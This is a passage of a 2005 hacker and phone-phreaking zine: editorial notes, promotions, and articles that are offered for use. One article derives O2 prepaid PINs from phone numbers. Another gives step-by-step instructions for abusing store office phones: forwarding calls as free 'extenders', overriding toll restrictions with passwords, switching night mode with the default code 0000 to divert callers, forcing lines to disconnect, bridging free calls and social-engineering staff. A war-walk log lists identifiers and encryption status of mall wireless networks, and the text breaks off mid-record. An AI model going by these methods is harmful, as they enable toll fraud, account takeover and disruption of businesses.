############################################################################## ############################################################################## ###### ##### ,#### ####ff ###### ###### ########### ###### ##### ,####### ##ff;; ###### ###### ########### ###### ##### ########## #ff;;; ######, ###### ########### ###### ##### ########## ###### #######, ###### ##### ########### ###### ###### ########,###### ########## ########## ###### ###### ############### ########## ########### ######## ###### ###### ############### ########## ######A##### ######## ###### ###### ######'######## ##### ###### ##### ###### ###### ###### '####### ##### ###### ##### ###### ###### ###### '###### ########### ###### ##### ###### ###### ###### ###### ########### ###### ##### ###### ###### ###### ###### ########### ####### ,E##EE, ,fftt,, ######## ,ffLLii######EE EE######L, ######### ;E####'i########;;#########K ########## ::tt..####KK;f########ff########KK ### ###### ii##EE;;####EE;f########ff########GG .:;, ### ###### .####EE;;####WW.f########EEff####WWiiLL####,. ### ###### ######i ####KKji########Wf''tt;;jjWW######jj ################ ,jj..jj####j KK##GG;;##WWjj,,iiffGG############EE, ################ ::####,,####iiKK##DD'iKKjjEE######################i, ################ ff####iiKK##ff;f##KK,,ffjj########################EE, ###### ';####GGjj##KK,,####;.WW,,ff########################jj, ###### LL####;.####,,####ttGG##;;iiKK######ff..GG##########;: `EE##LLLL##ffff##GG,,####GG..::LLjj ..############## 'WW##,,EE## `KK## EE####KK :;LL############KK ################ `''` ;ii. ,,jj..;;####,, ..GG################f; ################ ,;;EEEE;;, .. jj##################ff' ################ ;;########DD,, jj##################;' ##### ff##########WW ,i##################;' ##### GG############;, KK##############WW:' ##### ;;############ii..################i' ##### `;;##########ttii##############DD' ##### `ii########iiff##############;' ##### `GG######,,ff############DD ##### `;WW####. ;;############;' ##### ff####,, 'ff######jj' ##### tt####;; .;######;, ';##WW,, tt######;, `WW##ff jj########ii SIX F*CKING YEARS WW##GG ##########t' 'L##KK KK######DD' ** SPRING 2005 ** 'DDGG `tjjDDDD" cyb ############################################################################## ############################################################################## O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O | | . randOm wOrds . | | . Introduction . . . . . . . . . . . . . . . . . . . . . . . The Clone . | Contact Information . . . . . . . . . . . . . . . . . . . . The Clone | . Link of the Quarter . . . . . . . . . . . . . . . . . . . . The Clone . | K-1ine Mirrors . . . . . . . . . . . . . . . . . . . . . . The Clone | . Nettwerked Radio . . . . . . . . . . . . . . . . . . . . . The Clone . | 780 Records Corp . . . . . . . . . . . . . . . . . . . . . The Clone | . Voodoo Magick Boxes . . . . . . . . . . . . . . . . . . . . The Clone . | K-1ine Goes Wheneverly . . . . . . . . . . . . . . . . . . Nettwerked | . . | | . . | dOcuments | . . | O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES . . . . . . . Acid Data | . Phreaking the NEC i-Series phone systems . . . . . . . . . . War . | West Ed Mall Wifi Scan: Revisited . . . . . . . . . . . . . Fr0st | . Undressing Cryptography . . . . . . . . . . . . . . . . . . Aestetix . | The Guide to Using Google to Get Free Confz . . . . . . . . Aftermath | . The Inevitable Crash of Society . . . . . . . . . . . . . . Cyburnetiks. | Datapac Hacker's Kit: DataCrack Source Code . . . . . . . . Aftermath | . Datapac Hacker's Kit: DataSkan Source Code . . . . . . . . . Aftermath . | If I Were President . . . . . . . . . . . . . . . . . . . . DoobieEx | . Awstats exploit "shell" . . . . . . . . . . . . . . . . . . Omin0us . | How to brute force MSSQL . . . . . . . . . . . . . . . . . . H4v3n | . SQL Brute Source Code . . . . . . . . . . . . . . . . . . . H4v3n . | | . . | cOnclusiOn | . . | Credits . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone | . Shouts . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone . | | O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Introduction: It was May 22nd 1999 and K-1ine magazine had survived its one month anniversary. A new idea of mine had spawn out of bordem, and I felt it was time to test it out. That idea was Nettwerked. The idea was that Nettwerked would, over time, act as this country's top Internet phone phreaking resource. At this point Nettwerked was nothing but a few low-tech hacking articles, some of my own hand scans, and a few miscellaneous articles I wrote on telecom systems. It wasn't much but it definitely was better than the unbearable "boxing" sites with ripped off articles from LOD (Legion of Doom) technical journals. One thing I definitely didn't want was to make Nettwerked one of those sites. They lacked originality, creativity, and quite frankly A FUCKING CLUE about the current (POTS/VOIP) telephone networks. Nettwerked soon grew with my own wacky and wild phreaking articles, and naturally the outside contribution of phreaking articles to this site also grew. Before I knew it Nettwerked filled itself with over 100 telecommunications related articles, forty-something issues of K-1ine Magazine, Elcotel Research (an insanely large research project into Elcotel-based COCOT Payphones) Flex Technology Research, a popular discussion board, a monthly Nettwerked Meetings page, and a weekend Radio Show. It's been 6 years. This love child of mine, Nettwerked, has had its growing pains, was nearly shut down after fears (see: paranoia) of a post-Bush New World Order (thanks H410g3n for convincing me it was a bad idea), and has grown into a large community of friends who share a common goal; learning as much as possible about technology - at all costs. Thank you to everyone who have made this dream into a reality. I look forward to sharing another 6 years and more with you all through Nettwerked, K-1ine, Hack Canada, and any other Internet project/site that may just happen to pop up in the future. Remember though, all of this is only made possible by contribution. Without people giving a shit Nettwerked would cease to exist. Contribute your original files to Nettwerked/Hack Canada/K-1ine, contribute your original music to Nettwerked Radio, discuss technology on the discussion board, come to our meetings, buy a Voodoo Magick Box, link to the web-site. That is how *you* support our thriving Canadian H/P scene! Enjoy the Spring Issue of K-1ine (#47)... Six F*cking Years! Power to the people. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Contact Information; |*> Comments/Questions/Submissions: theclone@hackcanada.com |*> Check out my site: (Nettwerked) http://www.nettwerked.net |*> Check out the Web-forum: http://board.nettwerked.net/ -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Link of the Quarter: Every quarter I post one really great "link of the quarter" on each issue of K-1ine magazine. The link can be anything in the technology industry, music scene, rave scene, punk scene, or even a good article you read on a news site. I'll be taking submissions via e-mail or IRC right away; so get your links in and maybe you'll see it in the next issue of K-1ine! For the Spring 2005 issue of K-1ine, the link of the quarter is: http://www.phreakvidz.com Featuring full length telephone phreaking videos such as Kevin Poulsen on 'Unsolved Mysteries', 'Central Office Tour Video', and lastly the Masters of Deception's 'Phiber Optik' in a documentary called 'Unauthorized Access'. Submitted by: The Clone -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O K-1ine Magazine Mirrors: WIRETAPPED "Wiretapped.net is an archive of open source software, informational textfiles and radio/conference broadcasts covering the areas of network and information security, network operations, host integrity, cryptography and privacy, among others. We believe we are now the largest archive of this type of software and information, hosting in excess of 20 gigabytes of information mirrored from around the world." Now mirrored in two places, one in Belgium and another in Sydney. http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/ HACK CANADA "Hack Canada is the source for Canadian hacking, phreaking, freedom, privacy, and related information." http://www.hackcanada.com/canadian/zines/k_1ine/index.html SECURITY-CORE "Security-Core mirrors K-1ine.. and that's about it so far." http://security-core.com/modules.php?op=modload& name=Downloads&file=index&req=viewdownload&cid=5 .: (.dtors) :. "we look good... in our new town" - Omin0us' Security website http://dtors.ath.cx/index.php?page=k1ine -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Nettwerked Radio (Undergr0und Radio and Music every weekend!): Tune into this critically acclaimed radio show on: Saturday and Sunday from: 12:00am - 3:00am (MST). To listen, please tune in to: http://68.151.33.191:8000/listen.pls If you're not sure whether the show is on, just visit nettwerked.net, and look at the Radio section. If you see lime green "ONLINE", then we are live. You can listen in using Winamp, XMMS, or anything that will play Winamp streaming audio. We thank you for your support and hope that you tune in, give your feedback, and make those requests! -------------------------------------------------------- Contribute your music to Nettwerked Radio, and be heard: -------------------------------------------------------- Do you have your own band? Are you a solo artist? Do you make your own music on your computer, or with regular instruments? Be heard! Nettwerked Radio, on from 12AM-3AM (MST) every Saturday and Sunday, is now accepting submissions of YOUR original music for play. We accept MP3 or OGG formats. If you submit your music, be sure to include information on the band, and any information; such as location, and history. Nettwerked Radio will play your music and advertise your artist information! Nettwerked Radio is a great way to be heard without having to pay out for advertising, or passing out flyers, etc. We respect your copyright too. We will only play your songs when you want them played. We will not duplicate, share or otherwise pirate your songs. All interested artists please send your music and information to: the.clone@gmail.com For more information visit: http://www.nettwerked.net/radio/ -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O 780 Records Corporation... from the people who brought you Nettwerked Radio. 780 Records Corporation is a 100% independent record label focused on helping independent, signed and unsigned artists get a voice. We are helping artists who produce music in various genres (punk, rock, electronic, etc.) sell and distribute their music to the global scene. At 780 Records Corporation believe strongly in an artists ability to make a living, and control their music. This is a challenging thing in a world where large music labels do the exact opposite. As a record label, we will promote your music, your cds, and more. Our contracts plan to be about freedom for the artist (unlike many of the large labels you see out there who control the lives of the artists), and about being heard. Nothing is more important to us than that. We have unofficially adopted Google's famous business slogan: "Don't be evil". We feel "Don't be evil" is not only an impor- tant part of business, but an important part of life in general. 780 Records Corporation is also a supporter of 'Downhill Battle', a non-profit organization working to support participatory culture and build a fairer music industry. We plan to contribute free banner space, and donations to this very important organization who really do help independent artists across the globe. (Downhill Battle is available at: http://www.downhillbattle.org) For more information on 780 Records, or to find out how you can be a part of 780 Records visit: http://780.digaserve.com (soon to be http://www.780Records.com). -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Voodoo Magick Boxes: Voodoo Liquidation! - Nettwerked.net is pleased to announce the return of the Voodoo Magick Boxes! We are selling off the last of these fine machines, and with a fine price tag. We're selling for 50% less than their original cost! Buy a Voodoo Machine now: http://www.nettwerked.net/voodoo.html Price: $50.00 (US) + $12.00 (US) shipping. We accept PayPal as a main form of payment, but we also accept Paystone as a payment processor. For questions, please contact: theclone@hackcanada.com. Thank you for your interest in this incredible "wetware" product, and we hope you purchase one soon. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Nettwerked.net: K-1ine magazine goes wheneverly [ For Immediate Release ] Thursday, May 12, 2005: - Edmonton, Alberta -- In a decision that is sure to make headlines; Nettwerked has announced that 'K-1ine', Canada's longest running hacker, phreak, electr- onics, and political magazine has been turned into one that will now be publ- ished wheneverly. In its beginning, K-1ine initially started out as a magazine that was released whenever its only editor and major writer, The Clone, had the time to piece the beautiful ascii art filled digital pages with everything that an underground publication should have. However, after approximately one year, K-1ine quickly grew into a magazine that had many contributing writers and artists, so The Clone decided that keeping K-1ine as a release that came out rarely certainly was not going to cut it for his readers. He wanted to have something that all HackCanada.com / Nettwerked.net visitors could look forward to once a month. So in July of 2000, K-1ine turned into a monthly release, and stayed that way until three years later in the summer of two-thousand and three when K-1ine went quarterly. And now it seems we have to go wheneverly. What does that mean? It means we'll release issues whenever we feel we have received an acceptable amount of article submissions. Why? Well in the past several months it has become increasingly difficult to gather enough high quality articles within a quarter to justify a K-1ine release. We feel this is the only way we can keep K-1ine from going under. Much like Phrack Magazine in the United States eventually did, K-1ine will most likely have 'zine issue releases once or twice a year after the Spring 2005, K-1ine #47 release. We hope with this more laid back approach to K-1ine, we can make K-1ine even more high quality, and of course more special. Starting after #47, K-1ine will follow the newly implemented wheneverly format, and will contain all the great articles and stories that you've grown to love from the magazine that changed the face of the Canadian hacking / phreaking scene forever. With the gathering of issues over a longer period of time, we hope this means K-1ine's wheneverly releases are much larger, and more elite than the previous quarterly issues. Upcoming Issues: * Whenever 200X: K-1ine 48 * Whenever 200X: K-1ine 49 * Whenever 200X: K-1ine 50 (50TH ANNIVERSARY ISSUE - promotional items included) Sincerely, The Clone (Editor-In-Chief) -- Forward Looking Statements: The Nettwerked.net website contains forward looking statements that are based upon current expectations. Actual results could differ materially from those projected in the forward looking statements as a result of various risks and uncertainties including, among others, the timely introduction and acceptance of new products, costs associated with new product introductions, the transition of products to new hardware configurations and platforms and other factors, including those discussed in Nettwerked's annual and quarterly reports on file with the Kanada R3venue /\gency. This information should be read in conjunction with Nettwerked's most recent Registration Statement on phile with the Kanada R3venue /\gency, which contain a more detailed discussion of Nettwerked's business including risks and uncertainties that may affect future results; such as the fucking apocalypse. Nettwerked does not undertake to update any forward looking statements, because quite frankly we are lazy. This document is Copyright (c) 2005, Nettwerked. All Rights Preserved in M.S.G. ### -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O bbiab, things to do, people to screw family? a c i d d a t a . n e t p r e s e n t s [ O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES ] _____________ | ___ | | |___| O2 | |___________/ O2 can do .. [ Intro ] A few weeks ago i bought a new o2 ( o2-online.de ) prepaid card. I deliberated if it is possible to get the pin from my phone- number and i looked a while on my number and after a while i saw something interesting. [ Pin & phonenumber ] I add the two last 3-digit numbers together and after this i got a 4-digit number - my pin. Here is the simple turn: ( with a changed phonenumber just for example ) the number: 0176 12 424 754 add it: 424 + 754 the pin: 1178 [ Last words ] I dont know if this is a coincidence but i dont beleave that. Anyway the two 3-digit numbers, when you add them, must become a 4-digit number so the range of numbers in this case is minimal. O2 also have different numbers like 0179 and so on as prefix number with other different simple ways maybe, i dont know.. phreak it out and change your pin. (-; [ Greetings ] Greetings are going out to Security-AG, Koksclan.de, sm0g23er, Simoni, Jay-K, D-Nought and all my other good friends. a c i d d a t a . n e t 2 0 0 5 -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O i caused an accident once in your pants Phreaking the NEC i-Series phone systems by war The i-Series of desktop fones are manufactured by NEC. The i-Series includes the 28i, 124i and 384i phones. These phones were built by NEC for use in an office environment, and they perform satisfactorily in that role. NEC i-Series phones are used by a number of small and large businesses in North America. This article might, possibly, hopefully, give you some insight into power-use (or phreaking, whatever) of the i-Series fones. That's the idea, anways. I'm assuming a previous basic knowledge of how PBX systems work. The i-Series phones have quite a large array of features, too large to explain every feature in detail in one article. A quick overview of some of the i-Series features: Alarm Automated Attendent (Voice Announcer) Background Music Barge In (Emergency Interrupt-ish) Call Forwarding Follow-me Off-Premise DND Override Call Waiting/Camp On Conferencing MeetMe Internal/External Conferencing MeetMe Internal/External Paging Directory Dialing Internal/External Paging Programmable Function Keys Soft Keys (on select models) Reverse Voice Over Room Monitoring Tandem Trunking Voice Mail Physical Access As the topic says, let's first assume you have physical access to the actual phone. So, you may ask, "How do I gain physical access?" It's not that hard, really. If you spot an i-Series phone in a shop, you could simply ask them, "Can I use your phone?" It's not hard. So. Let's look at a couple useful features of the wonderful i-Series fone system. Call Forwarding Probably one of the most useful (in-my-opinion) options on the i-Series phones is the "Call-Forwarding" feature and Call-Forwarding Off-Premise feature. The i-Series phones have quite a few options when it comes to call-forwarding. You can forward your calls to voicemail, forward your calls to another extension, or forward to an external number. Call-forwarding also ties in with the Do-Not-Disturb (DND) functions of the phone. Call-Forwarding There are a couple call-forwarding modes. They are: Call-Forwarding when Busy or Not-Answered Call-Forwarding Immediate -immediately forwards your call using the given method without ringing the line at all Call-Forwarding when Not Answered Call-Forwarding Immediate with Both Ringing -immediately forwards your call using the given method, but still rings your line. Call-Forwarding to Voice Mail If you needed to active call-forwarding on a i-Series phone (once again assuming physical access), simply dial: 1. [*] + [2] 2. Dial Call Forwarding condition: 1 - VoiceMail 2 - Busy or Not Answered 4 - Immediate 6 - Not Answered 7 - Immediate with Both Ringing 0 - Cancel Call-Forwarding 3. Then dial the extension, Voice Mail master number, or simply press the [Voice Mail] programmable key (if there is one.) 4. Dial Call Forwarding Type 2 - All calls 3 - Outside calls only 4 - Intercom calls only So, overall, if you wanted to say...forward all your calls immediately to extension 555, you would dial: [*][2] + [4] + [5][5][5] + [2] + hangup Call-Forwarding Off-Premise Call-Forwarding Off-Premise can be used to forward your calls to another number. There are quite a few different ways to exploit this feature, assuming local access at an i-Series fone. To turn on Call-Forwarding Off-Premise, dial: 1. [*] + [2] 2. [6] + Dial line access code { Line access codes are: [9] Automatic Route Selection (ARS) / Trunk Group Routing Dialing "9" for an outside line is probably the most common way known by people using PBX systems to get an outside line. "9" is the extension commonly designated for Automatic Route Selection - the fone system chooses what line you are going to use for you. [8][0][4] + Line Group (1-9 , 01-99, 001-128) 804x dialing is Line Group Selection dialing. You can manually select the outgoing trunk group that you want your call to be placed via. For example, if there is more than one business at in your office, you might have a trunk group "1" for the "ABC Packaging Corp", and a trunk group "2" for the "BCD Shipping Co." If you were calling out using "9" on a phone belonging to the "BCD Shipping Co., you would be actualliny dialing "8042". That would route you onto the BCD Shipping Co. trunk group. But, you could also theoretically dial "8041" to make an outgoing call over the trunk group assigned to ABC Packaging. (I hope that makes sense). [#][9] + Line Number Selection You can select an absolute line using "#9". You could dial "#9" + "05" to get line number 05. } 3. Then dial the external number where you want your calls to be forwarded. 4. Hangup. Call-Forwarding Off-Premises is a quick-n-dirty way to get an overnight extender. If you were to walk up to a Future Shop employee, and ask them to use their phone, you might be able to set it to Call-Forward Off-Premises. But, chances are that it would be noticed the next day. If you want to maximize the length of time before the Call-Forwarding is removed, there are options to be considered. Forward to the Operator. If you're forwarding to the operator, and then getting him/her to place the call, you aren't going to be endangering your favorite bridge or your friend. Find a remote phone that rarely receives calls. In large retail outlets (Future Shop, Best Buy, Canadian Tire, etc) there are often departments that are lower traffic then others. For example, appliances. How many people go to Future Shop to buy appliances? None, you say? Well then, if you're going to pick a fone to set up as an extender, might I suggest you use a phone in the appliance department? Chances are, it's going to recive less traffic which means less chance of your extender getting taken down. +++ Forced Trunk Disconnection While still on the physical access topic...Force Trunk Disconnection. If for any unknown reason, you needed to release a line, simply dial up the line using: [#][9] + line number (ie 01, 02, 03, 005, whatever) + [*][3] That will disconnect (read abruptly terminate) the connection. I'm sure you can figure out a good use for that. +++ Night Service Mode Ever find a nice afterhours voicemail system that you just can't wait until the evening to play with? Even if it means cutting off legitimate users? No, me either. But, with Night Service Mode, you can do just that. Switching to Night Service Mode during the daylight hours, especially in a busy store, usually makes incoming callers upset. People calling in get voicemail. And such. But, it's a convenient (for you) way in a pinch to get access to an afterhours system. To physically turn on Night Service Mode from a phone, just dial: 1. [8][1][8] + Night Service Password The default Night Service Password is "0000". 2. Dial the Night Service Mode 0 Day mode 1 Night mode 2 Midnight mode 3 Rest mode 4 Day 2 mode 5 Night 2 mode 6 Midnight 2 mode 7 Rest 2 mode So, to turn on Night Service Night Mode during the day at your (least?) favorite local Staples (or whatever uses i-Series) simply dial: [8][1][8] + [0][0][0][0] + [1] That is, of course, assuming the password is default. +++ Outgoing Calls Some i-Series phone systems have toll restrictions. To override toll restrictions, simply dial: [8][7][5] + Password As well, some systems that use ARS (Automatic Route Selection) are coded. Many larger companies like Nortel that have high volumes of calling often code their PBX systems so that calls can be catalogued effectively, and to discourage over-use and fraudulent use. If the systems you are using is using coded ARS, when you dial "9", you'll get a dialtone and can dial your number as normal. But, after you have dialed the number, you will be dropped to another dialtone and will have to enter the ARS code. +++ Bridging and Social Engineering Bridging is the act of placing two outside callers in a conference call, and then dropping out of the call. Let's say that two of your phreak buddies decide that they want to talk. But, maybe they don't want to pay for it. Simple enough. You just walk down to your local K-Mart, and find an remote phone. Then, wait for one of your buddies to call up the local K-Mart's 800 number and ring your phone. When he does, simply press the [Conf] button on your i-Series phone. Then, wait for your second buddy to ring your line. When he does, press [Conf] twice. This will connect the two parties. To drop out of the conference and leave the two parties talking, simply press [HOLD] + [#][8]. Now on the other side of the coin. Many companies set up tandem trunking conferences to allow outside employees such as service technicians or other field workers to talk to each other. You could social engineer an secretary into creating a bridging line to talk on. If she doesn't know how, now you can walk her through it, since you know. Many secretaries also refer to bridging conferences as "Tandem Conferences", "Tandem Trunking Lines", or something similar to that. [ BlackRatchet wants to remind you that a 'Tandem Trunking Line' is not a technical term. A trunk and a line are different. Not the same. He really, REALLY wanted me to note that. So here it is. ] +++ That's about it. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O what the FUCK is a sex token??/ you're too young! cover eyes lol * Cygnus opens eyes!! hehe Cygnus: for peep shows, et al Cygnus - it's when a mommy loves a daddy and he puts his bird into her bee lol clone, stfu ################################################ # # # West Ed Mall Wifi Scan: Revisited # # Article By: fr0st # # Original Article By: cybersk4nk # # Contact Info: fr0sty (at) shaw (dot) ca # # http://blondebomber.no-ip.com # # # ################################################ After reading the original article by cybersk4nk, I knew I had to do a follow up so here it is. The Story: I decide to start my adventure of the war walk in Starbucks that is located in and beside Chapters in West Edmonton Mall. Sitting in the Starbucks gave me a little time to get everything working and everything set up. So put my laptop into my bag and off I went. The Setup: The laptop I was using for this WiFi scan was a IBM ThinkPad T21, running Free BSD 5.3, Kismet 2005 01 R1, with a prism2.5 SMC2532W-B. The SMC2532W-B is a 200mW card, and let me tell you, this card packs a lot of power. The Results: Network 1: "3dbcamwireless" BSSID: "00:40:05:55:17:45" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 08 WEP : "Yes" Maxrate : 22.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:15:41 2005" Last : "Wed Mar 30 06:02:12 2005" Network 2: "5356ep" BSSID: "00:0F:C8:00:15:13" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:17:26 2005" Last : "Wed Mar 30 06:02:10 2005" Network 3: "linksys" BSSID: "00:0F:66:90:CE:9A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 0.0 LLC : 3 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:17:28 2005" Last : "Wed Mar 30 05:46:38 2005" Network 4: "linksys" BSSID: "00:0E:35:79:D0:DE" Type : unknown Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 18.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:17:29 2005" Last : "Wed Mar 30 05:17:30 2005" Network 5: "" BSSID: "00:06:B1:14:3C:AB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 17 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 17 First : "Wed Mar 30 05:17:32 2005" Last : "Wed Mar 30 06:03:44 2005" Network 6: "111" BSSID: "00:0F:66:D6:5C:FC" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 54.0 LLC : 8 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:18:34 2005" Last : "Wed Mar 30 06:04:34 2005" Network 7: "GdbuzzAP" BSSID: "00:09:5B:AA:07:A8" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 10 WEP : "Yes" Maxrate : 0.0 LLC : 2 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:18:50 2005" Last : "Wed Mar 30 06:05:08 2005" Network 8: "" BSSID: "00:06:B1:14:44:EF" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 02 WEP : "No" Maxrate : 11.0 LLC : 25 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 25 First : "Wed Mar 30 05:19:02 2005" Last : "Wed Mar 30 06:08:26 2005" Network 9: "linksys" BSSID: "00:06:25:98:7A:0C" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 15 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 16 First : "Wed Mar 30 05:20:39 2005" Last : "Wed Mar 30 06:08:37 2005" Network 10: "default" BSSID: "00:0D:88:2F:F1:A7" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:24:05 2005" Last : "Wed Mar 30 05:37:06 2005" Network 11: "151" BSSID: "00:A0:F8:46:6A:BB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:24:49 2005" Last : "Wed Mar 30 05:35:44 2005" Network 12: "WEMiSphere" BSSID: "00:0F:C8:00:15:28" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:19 2005" Last : "Wed Mar 30 05:35:52 2005" Network 13: "FLHGuest" BSSID: "00:0F:C8:00:15:29" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 14: "WEM_Conference" BSSID: "00:0F:C8:00:15:2A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 15: "SMC" BSSID: "00:04:E2:94:5E:14" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:26:15 2005" Last : "Wed Mar 30 05:26:15 2005" Network 16: "111" BSSID: "00:0F:66:D6:5C:F9" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 54.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:26:20 2005" Last : "Wed Mar 30 05:29:24 2005" Network 17: "poswireless" BSSID: "6E:BF:53:EA:12:39" Type : ad-hoc Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:26:21 2005" Last : "Wed Mar 30 05:29:15 2005" Network 18: "" BSSID: "00:06:25:22:A0:2F" Type : probe Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:28:17 2005" Last : "Wed Mar 30 05:28:17 2005" Network 19: "" BSSID: "00:01:4A:10:68:4C" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:31:17 2005" Last : "Wed Mar 30 05:31:17 2005" Network 20: "170" BSSID: "00:A0:F8:80:94:F6" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:32:01 2005" Last : "Wed Mar 30 05:32:01 2005" Network 21: "chan international" BSSID: "00:0D:88:95:1A:88" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 36.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:32:11 2005" Last : "Wed Mar 30 05:32:42 2005" Network 22: "170" BSSID: "00:A0:F8:80:96:E3" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:32:21 2005" Last : "Wed Mar 30 05:33:42 2005" Network 23: "170" BSSID: "00:A0:F8:80:94:72" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:32:24 2005" Last : "Wed Mar 30 05:32:41 2005" Network 24: "170" BSSID: "00:A0:F8:80:93:DA" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:32:25 2005" Last : "Wed Mar 30 05:32:25 2005" Network 25: "default" BSSID: "00:11:95:2C:8D:22" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 0.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 